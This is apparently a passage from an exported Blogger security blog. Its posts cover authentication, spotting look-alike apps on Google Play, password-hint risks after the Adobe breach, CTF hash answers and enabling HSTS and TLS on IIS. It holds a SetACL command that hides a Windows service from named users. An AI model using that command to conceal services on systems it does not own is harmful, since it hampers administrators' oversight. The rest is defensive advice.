remote bad guys to transfer out your cash).<br /><br />That being said, I think they are probably making the authentication process more complicated than it needs to be and not more secure. Hard tokens that are transparent to the user like Ubi-key or smart cards are much, much more secure.<br /><br />So uhh disrupting the paradigm, I thought I could make case that the above three did disrupt the paradigm, but they don't. I started this article all gung-ho to prove to myself they did, but they simply extend what we already have.<br />Device profiling and risk based authentication either work with existing factors of authentication, or make a sting of numbers unique to you and your device part of auth (just like a certificate or token, and thus are a second factor), and pingrid is simply an extension of single factor authentication.<br /><br />Seeing as I mentioned Schneier last time I posted about auth, I had a look to see is he has discussed pingrid or others, he hasn't. But I did find the below, which is awesome; <br /><a href="http://www.schneierfacts.com/fact/vote/631">http://www.schneierfacts.com/fact/vote/631</a>Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-81892049943818362732014-08-16T15:53:00.000+10:002016-07-25T16:04:08.461+10:00Playing with googleSo I was recently having a discussion with a vendor about the insecurity versus usability of the google play store, yep there is <a href="http://www.pcworld.com/article/2099421/report-malwareinfected-android-apps-spike-in-the-google-play-store.html">malware there</a>, yep there are <a href="http://www.tomsguide.com/us/data-stealing-google-play,news-19059.html">copycat scam apps</a>. But google will eventually get it under control, just as apple has <a href="http://bgr.com/2013/03/06/ios-android-user-data-leaks-study-361608/">done...</a><br /><br />Ok so you can't trust either of them, but I think Apple is actually doing a better job of keeping the look-a-like scam apps out, at least I haven't heard of any yet, and this is coming from me a very anti-apple person. <br /><br />So what do you do if you have written an Android app. Well you could host it on your own site, but then you need to reduce your customers security by making them set their device to allowing apps be installed from anywhere, opening them up to drive by downloads that are becomming prevelent in Android land (mainly due to some manufacturers enabling this setting by default).<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-avgpXLau3ig/U7o0pvPpaYI/AAAAAAAAKC4/LAhFRex6MGY/s1600/Screenshot_2014-07-07-12-58-25.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://4.bp.blogspot.com/-avgpXLau3ig/U7o0pvPpaYI/AAAAAAAAKC4/LAhFRex6MGY/s1600/Screenshot_2014-07-07-12-58-25.png" width="112" /></a></div>You could host a QR code on your site and point this to your play store app...<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-T2eiV36kJT0/U7o1gYfprSI/AAAAAAAAKDE/21oqcZ5r410/s1600/qr-codes.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://3.bp.blogspot.com/-T2eiV36kJT0/U7o1gYfprSI/AAAAAAAAKDE/21oqcZ5r410/s1600/qr-codes.jpg" width="240" /></a></div>Maybe just a link on your site back to the play store to ensure they get the right version of the app.<br /><br />This got me thinking, it doesn't really protect you from those that just look through the store for apps from your company, so you should protect yourself in some other way. I use google alerts already to monitor stuff I am interested in, as well as comments about things I am interested in for <a href="http://lifehacker.com/5879922/use-google-alerts-as-an-identity-theft-personal-watchdog">security reasons</a>.<br /><br />This is where I thought I could make a search alert for: site:play.google.com appname<br />I wanted to try it out first, so I did: site:play.google.com commbank<br />Commbank is a big bank in Australia, and they have a few apps, one caught my attention; <a href="https://play.google.com/store/apps/details?id=au.com.commbank.hr.sidekick&amp;hl=en">https://play.google.com/store/apps/details?id=au.com.commbank.hr.sidekick&amp;hl=en</a><br />Looks to me like Commbank trust the store so much they trust a third party to put up an app for them for their users to access the intranet. The company that listed the app at time of writing was <a href="http://www.gpssolutionsdevelopers.com/">http://www.gpssolutionsdevelopers.com/</a> who's site looks like it is what is being loaded for the app;<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-oVKlSq9GIyk/U7o4nSSunBI/AAAAAAAAKDQ/zAlxl4prKJM/s1600/www.gpssolutionsdevelopers.com.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://2.bp.blogspot.com/-oVKlSq9GIyk/U7o4nSSunBI/AAAAAAAAKDQ/zAlxl4prKJM/s1600/www.gpssolutionsdevelopers.com.png" width="266" /></a></div>The domain was suspiciously registered on the 28th of January this year.<br />I might need to reinstall this app and do a packet capture to see what web services it is trying to hit on this site, but this site is not https, and is hosted on a shared host that has unencrypted ftp, smtp and imap enabled. I let someone I have met from Commbank's IT security team know, and this was all amazingly fixed within a few hours. Props to them.<br />I did a packet capture post their fixes and it is all over ssl/tls now.<br /><br />So anyway I guess the take-a-way is, if you want to add some security even for google play apps, you can setup a google alerts at <a href="http://www.google.com/alerts">http://www.google.com/alerts</a> and do one for <i>site:play.google.com appname</i> set it for As-it-happens and hope you never get that email.Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-84745393457203807732014-04-07T18:01:00.000+10:002014-04-07T18:01:00.178+10:00Service hiding/protectionThis is a bit of operational security, but it took me a lot longer than I would have liked to do, and no one had an example like the below. This command will use the open source Access control list command line utility <a href="http://helgeklein.com/setacl/">SetACL</a> to lockdown a service so that the user specified can't stop or start it, on testing it is even better than that the service dissapears from the services manager.<br /><br /><i>setacl.exe -ot srv -on "Service Name" -ace "n:domain\username;p:start_stop;m:deny" -actn ace</i><br /><br /><br /><br /><br /><br />This is obviously a really good idea if you have admins of a box that you don't want to be able to stop a key service, it could also allow you to stop a malicious user from seeing a specific service, depending on the malicious users method of getting onto your server.Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-31118158838840318422013-11-25T22:35:00.001+11:002018-03-07T14:29:32.557+11:00Password HintsOK let me preface this by saying this: I absolutely hate password hints and secret questions. Generally speaking anything you put in there can be found by friending someone on facebook, a quick google or simply guessing. They are the epitome of a bad idea, sure they have some use. If you forget your password the hint if constructed correctly could remind you and only you, however most people don't understand this.<br />If it is a secret question an answer, where the question is predefined such as mothers maiden name, it can take a few guesses (smith anyone), or a quick google.com search and you will have it. Everything else is trivial, and this was how Sarah Palin's yahoo email account was humorously compromised back in <a href="http://www.wired.com/threatlevel/2008/09/palin-e-mail-ha/">2008</a>.<br /><br />Forgetting all that, adobe gave us another insight as to why it is bad.<br /><br />I know a lot has been said about adobe, including the excellent (although conservative number of users impacted) article by Brian Krebs <a href="http://krebsonsecurity.com/2013/10/adobe-breach-impacted-at-least-38-million-users/">here.</a><br /><br />But there is something else that needs to be learnt from this breach.<br />Sure your password hint could be terrible but maybe the web application logs someones IP when they go to that for later alerting etc if a bad guy does compromise the account. But what if the DB gets walked, and all those juicy password hints or secret questions and answers are stored in plain text... then you have a problem even if you correctly store you passwords (which adobe didn't).<br /><br />So lets say you do correctly store your password as a per-user salted sha1+ hash, good, but now you allow users to have a password hint like adobe. When someone has their password hint as their password in another language then they fail very quickly. For example (this is not a real entry, but made to look like one from the adobe breach);<br /><br /><span class="comment">78114563-|--|-notreal@fakedomain.com-|-BsscHGd8aIjiwxG2CaWrHSw==-|-Gato x3|--</span><br /><br />If we forgive the obviously non-hashed password in the 4th column, we see in the last column the password hint is simply Gato x3, or you know maybe Cat typed out three times. So even if this entry had an irreversible hashed password, the hint would give it all away if the DB where accessed.<br />Maybe they should instead store their hint as a reversible encrypted string with an individual key for each user. This would mean the server when the user wants to use their password hint would look up the key from the internally accessible internal key server for the username and decrypt the hint. It would mean if the db is walked via an SQL injection or direct attack they aren't necessarily going to get the keys to decrypt the password hint. For a secret question and answer, you should salt and hash the answer and if you are using user defined questions you should encrypt those too just to reduce what is leaked...<br /><br />Using an encrypted password with the same decryption key for all users or using an unsalted hash means that the resulting password string whether it is BsscHGd8aIjiwxG2CaWrHSw== or 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8 will be the same across all users meaning if you break one you break them all. The same goes for your "password hint" or "secret question and answer", should people take my advice and start encrypting them.<br /><br />Of course all of this only works if you care about security. If you aren't going to hash your passwords. Or worse store them in plain text as <a href="https://krebsonsecurity.com/2013/11/cupid-media-hack-exposed-42m-passwords/">Cupid Media</a> did, then you probably don't care about users password hints, and will probably store them in plain text.<br />Realistically no-one has any excuse now, google authenticator for two factor has been open sourced, OpenID, SAML can be used to authenticate you to a central store and then you are done, like UbuntuForums did, post their breach, move to UbuntuOne the openID provider. People like adobe should really switch to one of these, to reduce their authentication load. The users should be forced at these central providers to 2-factor auth. If you forget your password at one of these central providers then you have a convoluted way to retrieve it via out of band identification, via either partnership with a bank or other multi-vendor approach, eg go into these news agencies and show 100 points of ID to get your password reset.<br /><br />My point I am trying to make is this, if it is used for authentication it should be encrypted, preferably and sufficiently strong hash (SHA1 or greater) that is salted. Nothing but the username and row ID of your authentication table should be plain text. It is only a matter of time before these passwords in the 10gb adobe database are broken and the key used to decrypt them is found, if it hasn't happened already.<br /><br />Add these ~130million adobe accounts with the 42million from the Cupid Media and I think we should declare this month, change password November, I know the few sites that used the same password as my account on adobe have now all been changed, have yours? If you use the same password everywhere, then now is the time to look at <a href="http://keepass.info/">keepass</a> or <a href="https://lastpass.com/">lastpass</a> to store your single use passwords in a manner that allows for your protection. Heck even Google's Chrome and Firefox have built in password managers with cloud sync and encryption, so there really is no excuse.<br /><br />I am doing a CTF for some peeps, thought I'd put this here to be searchable.. these are the real sums of these phrases;<br />2D579CD75056723657B8FA68FA6626C245CD362030159965EFBDF41DA2D67ADF:redherring<br />86DB5B1C2D9C1854FE5B80318FBC806C53EDD2C5DBABAFA42CC909A867AE3E21:RedHerring<br />BC1A7086C334A3C3E2AC638DF4C82A58DEBC6CF2DAF05C4B1D17E9896BC69908:red herring <br />Or check it here; https://passwordsgenerator.net/sha256-hash-generator/ or on your bash shell with <i>echo -n redherring | sha256sum</i>Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-33452908861420006762013-01-21T01:31:00.001+11:002013-10-02T10:10:14.302+10:00SSL is dead, long live TLS1.0, er 1.1, er 1.x<a href="http://www.blogger.com/blogger.g?blogID=7184718389860127472" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=7184718389860127472" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a>So I thought I would post this as I couldn't find a definitive answer anywhere; how to enable HTTPS Strict Transport Security, or HSTS on IIS 7.5 on Windows 2008 r2. It is really, really simple.<br />Open the iis manager, navigate to the site and go to HTTP Response headers. Add a new HTTP Response header with name of Strict-Transport-Security and Value of max-age=300 like the below;<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-u2gyPigIx2s/UPUL7PqNjEI/AAAAAAAAAbY/mCbYVcVpBbI/s1600/tls.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="181" src="http://2.bp.blogspot.com/-u2gyPigIx2s/UPUL7PqNjEI/AAAAAAAAAbY/mCbYVcVpBbI/s320/tls.png" width="320" /></a></div><br /><br />Then click ok, you will more than likely need to restart iis to get this to work from my experience.<br /><br />I also thought I might mention how to enable TLS 1.1 and TLS 1.2, save the below as a .reg file and do the old regedit /s file.reg from an elevated prompt to get it imported, then reboot.<br /><br /><i>Windows Registry Editor Version 5.00<br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2]<br /><br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Client]<br />"Enabled"=dword:00000001<br />"DisabledByDefault"=dword:00000000<br /><br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Server]<br />"Enabled"=dword:00000001<br />"DisabledByDefault"=dword:00000000<br /><br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1]<br /><br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1\Client]<br />"Enabled"=dword:00000001<br />"DisabledByDefault"=dword:00000000<br /><br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1\Server]<br />"Enabled"=dword:00000001<br />"DisabledByDefault"=dword:00000000</i><br /><br />Another awesome page I found during my travels that needs more publicity is by Qualys, it does a full SSL/TLS implementation test and tells you how you fared; <!--[if gte mso 9]><xml> <o:OfficeDocumentSettings> <o:AllowPNG/> </o:OfficeDocumentSettings></xml><![endif]--><br /><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-AU</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:EnableOpenTypeKerning/> <w:DontFlipMirrorIndents/> <w:OverrideTableStyleHps/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="&#45;-"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true" DefSemiHidden="true" DefQFormat="false" DefPriority="99" LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false" UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles></xml><![endif]--><!--[if gte mso 10]><style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin-top:0cm; mso-para-margin-right:0cm; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0cm; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi; mso-fareast-language:EN-US;} </style><![endif]--><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-AU; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: &quot;Times New Roman&quot;; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; 